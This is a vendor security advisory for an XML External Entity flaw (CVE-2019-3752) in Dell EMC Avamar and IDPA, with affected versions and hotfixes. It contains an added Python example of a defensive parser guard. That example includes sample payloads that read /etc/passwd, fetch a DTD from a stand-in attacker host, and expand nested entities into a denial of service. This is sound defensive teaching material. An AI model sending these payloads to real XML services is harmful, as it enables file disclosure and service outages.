DSA-2019-119: Dell EMC Avamar XML External Entity Injection Vulnerability
Summary: Dell EMC Avamar contains remediation for an XML External Entity Injection vulnerability that may potentially be exploited by malicious users to compromise the affected system.
Impact
High
Details
Dell EMC Avamar Server versions 7.4.1, 7.5.0, 7.5.1, 18.2, and 19.1 and Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1, 2.2, 2.3, and 2.4 contain an XML External Entity (XXE) Injection vulnerability. A remote unauthenticated malicious user may potentially exploit this vulnerability to cause a Denial of Service or an information exposure by supplying specially crafted document type definitions (DTDs) in an XML request.
CVE-2019-3752
8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H)
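The advisory names two outcomes for a crafted DTD in an XML request: denial of service (entity expansion) and information exposure (an external entity that reads a local file or fetches a remote DTD). The following added example, which is not code from the advisory or from Dell, shows both payload shapes against Python's standard-library expat parser and the guard a server-side XML endpoint should apply: abort on any DOCTYPE, entity declaration or external entity reference before anything is expanded or fetched. The function names (parse_lax, parse_untrusted, classify) and the sample documents are constructed for illustration and do not come from Avamar traffic.

```python
"""Added example (not Dell code): a DTD/XXE guard for an XML endpoint.

parse_untrusted() wraps the standard-library expat parser so that any DOCTYPE,
entity declaration or external entity reference aborts parsing before it can
be expanded or fetched. parse_lax() is the unhardened counterpart, kept only
to show how an internal-subset DTD amplifies character data (the DoS case).
"""
import xml.parsers.expat as expat


class DTDRejected(ValueError):
    """Raised when an untrusted document carries a DTD or entity construct."""


def parse_lax(data: bytes) -> str:
    """Permissive parse: returns the concatenated character data with
    internal entities expanded. This is the behaviour an XXE/DoS relies on."""
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)


def parse_untrusted(data: bytes) -> str:
    """Hardened parse: same result as parse_lax for plain documents, but
    refuses DOCTYPE declarations, entity declarations and external entity
    references, so nothing is expanded or read from disk or the network."""
    parser = expat.ParserCreate()
    chunks = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDRejected(f"DOCTYPE {name!r} rejected (SYSTEM={sysid!r})")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise DTDRejected(f"entity {name!r} rejected")

    def external_entity_ref(context, base, sysid, pubid):
        raise DTDRejected(f"external entity reference {sysid!r} rejected")

    # The DOCTYPE handler fires first and stops the parser; the other two are
    # defence in depth in case a document reaches them by another route.
    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)


# Constructed sample requests (assumed element names, not Avamar's schema).
BENIGN = b"<request><client>backup-01</client></request>"

# Information exposure: an external general entity whose value would be the
# contents of a local file, echoed back to the client in the response.
FILE_XXE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE request [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<request><client>&xxe;</client></request>"
)

# External DTD: a resolving parser would fetch and evaluate it.
REMOTE_DTD = (
    b'<!DOCTYPE request SYSTEM "http://attacker.invalid/evil.dtd">'
    b"<request><client>backup-01</client></request>"
)

# Denial of service, scaled down: 4 x 4 x 4 = 64 copies of "lol" from a few
# bytes of DTD. Real payloads nest about ten levels for ~10^9 expansions.
BILLION_LAUGHS = (
    b"<!DOCTYPE lolz ["
    b'<!ENTITY lol "lol">'
    b'<!ENTITY lol1 "&lol;&lol;&lol;&lol;">'
    b'<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;">'
    b'<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;">'
    b"]><lolz>&lol3;</lolz>"
)


def classify(data: bytes) -> str:
    """Return 'accepted' or the guard's rejection message."""
    try:
        parse_untrusted(data)
        return "accepted"
    except DTDRejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    samples = [("benign", BENIGN), ("file xxe", FILE_XXE),
               ("remote dtd", REMOTE_DTD), ("billion laughs", BILLION_LAUGHS)]
    for label, doc in samples:
        print(f"{label:15} -> {classify(doc)}")
    print("lax expansion of the 3-level payload:",
          len(parse_lax(BILLION_LAUGHS)), "characters")
```

The guard rejects at the DOCTYPE declaration, which is the earliest point at which any of the three payloads can be told apart from a benign request; a parser that merely declines to resolve external entities still expands internal ones and remains exposed to the DoS case.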
Affected Products & Remediation
Affected products:
Dell EMC Avamar Server versions 7.4.1, 7.5.0, 7.5.1, 18.2, and 19.1
Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1, 2.2, 2.3, and 2.4.
Resolution:
The following Dell EMC Avamar hotfixes address this vulnerability:
- Dell EMC Avamar Server 7.4.1 HOTFIX 311380 (Avamar MC Cumulative)
- Dell EMC Avamar Server 7.5.0 HOTFIX 311826 (Avamar MC Cumulative)
- Dell EMC Avamar Server 7.5.1 HOTFIX 311381 (Avamar MC Cumulative)
- Dell EMC Avamar Server 18.2 HOTFIX 311382 (Avamar MC Cumulative)
- Dell EMC Avamar Server 19.1 HOTFIX 314375 (Avamar Cumulative Patch)
- Dell EMC Integrated Data Protection Appliance (IDPA) 2.0 HOTFIX 311380 (Avamar MC Cumulative)
- Dell EMC Integrated Data Protection Appliance (IDPA) 2.1 HOTFIX 311826 (Avamar MC Cumulative)
- Dell EMC Integrated Data Protection Appliance (IDPA) 2.2 HOTFIX 311381 (Avamar MC Cumulative)
- Dell EMC Integrated Data Protection Appliance (IDPA) 2.3 HOTFIX 311382 (Avamar MC Cumulative)
- Dell EMC Integrated Data Protection Appliance (IDPA) 2.4 HOTFIX 314375 (Avamar Cumulative Patch)
Dell EMC recommends all customers upgrade at the earliest opportunity.
Refer to KB Article 513978: How to install an Avamar .avp hotfix using Avamar Installer (AVI) for instructions on applying an MC Cumulative hotfix. Applying an MC Cumulative hotfix updates the Management Console Server (MCS) and restarts the scheduler.
For Avamar 19.1, the Avamar Cumulative Patch bundles all available hotfixes into a single package. Refer to KB Article 537643: How to Install Avamar 19.1 Cumulative Patch HF 314375 for instructions on applying the hotfix. (Only registered Dell customers can access the content of the article via Dell.com/support.)
Note: Applying the 19.1 Cumulative Patch shuts down and restarts Avamar services.
Revision History
Revision | Date | Description
1.0 | 2019-10-09 | Initial Release
1.1 | 2021-11-09 | Product Tagging
Acknowledgements
Dell EMC would like to thank Harrison Neal for reporting this vulnerability.